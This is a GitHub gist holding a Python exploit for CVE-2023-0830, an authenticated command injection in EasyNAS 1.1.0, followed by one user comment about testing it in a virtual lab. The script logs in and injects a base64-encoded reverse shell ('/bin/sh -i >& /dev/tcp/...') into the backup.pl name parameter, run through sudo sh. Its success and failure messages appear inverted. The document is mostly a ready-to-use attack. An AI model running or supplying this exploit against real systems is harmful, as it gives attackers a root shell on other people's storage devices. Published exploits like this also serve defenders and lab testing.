Last active
November 2, 2023 16:09
-
-
Save xbz0n/674af0e802efaaafe90d2f67464c2690 to your computer and use it in GitHub Desktop.
EasyNAS 1.1.0 - Authenticated OS Command Injection Exploit
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Exploit Title: EasyNAS 1.1.0 - Authenticated OS Command Injection Exploit | |
| # Date: 2023-02-9 | |
| # Exploit Author: Ivan Spiridonov (ivanspiridonov@gmail.com) | |
| # Author Blog: https://xbz0n.medium.com | |
| # Version: 1.1.0 | |
| # Vendor home page : https://www.easynas.org | |
| # Authentication Required: Yes | |
| # CVE : CVE-2023-0830 | |
| #!/usr/bin/python3 | |
| import requests | |
| import sys | |
| import base64 | |
| import urllib.parse | |
| import time | |
| from requests.packages.urllib3.exceptions import InsecureRequestWarning | |
| # Disable the insecure request warning | |
| requests.packages.urllib3.disable_warnings(InsecureRequestWarning) | |
| if len(sys.argv) < 6: | |
| print("Usage: ./exploit.py http(s)://url username password listenerIP listenerPort") | |
| sys.exit() | |
| url = sys.argv[1] | |
| user = sys.argv[2] | |
| password = sys.argv[3] | |
| # Create the payload | |
| payload = "/bin/sh -i >& /dev/tcp/{}/{} 0>&1".format(sys.argv[4], sys.argv[5]) | |
| # Encode the payload in base64 | |
| payload = base64.b64encode(payload.encode()).decode() | |
| # URL encode the payload | |
| payload = urllib.parse.quote(payload) | |
| # Create the login data | |
| login_data = { | |
| 'usr':user, | |
| 'pwd':password, | |
| 'action':'login' | |
| } | |
| # Create a session | |
| session = requests.Session() | |
| # Send the login request | |
| print("Sending login request...") | |
| login_response = session.post(f"https://{url}/easynas/login.pl", data=login_data, verify=False) | |
| # Check if the login was successful | |
| if 'Login to EasyNAS' in login_response.text: | |
| print("Unsuccessful login") | |
| sys.exit() | |
| else: | |
| print("Login successful") | |
| # send the exploit request | |
| timeout = 3 | |
| try: | |
| exploit_response = session.get(f'https://{url}/easynas/backup.pl?action=backup&menu=none&.submit=Backup&name=%7cecho+{payload}+%7c+base64+-d+%7c+sudo+sh+%7c%7ca+%23', headers={'User-Agent':'Mozilla/5.0 Gecko/20100101 Firefox/72.0'}, timeout = timeout, verify=False) | |
| if exploit_response.status_code != 200: | |
| print("[+] Everything seems ok, check your listener.") | |
| else: | |
| print("[-] Exploit failed, system is patched or credentials are wrong.") | |
| except requests.exceptions.ReadTimeout: | |
| print("[-] Everything seems ok, check your listener.") | |
| sys.exit() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
hello, can you please help me with this?
I downloaded the vulnerable version on virtual box.
I can ping it.
I created an account and was able to log in.
I tried to run the exploit with nc running, the code runs and gives me ([-] Everything seems ok, check your listener.)
nc doesn't show anything. what could be the problem? thanks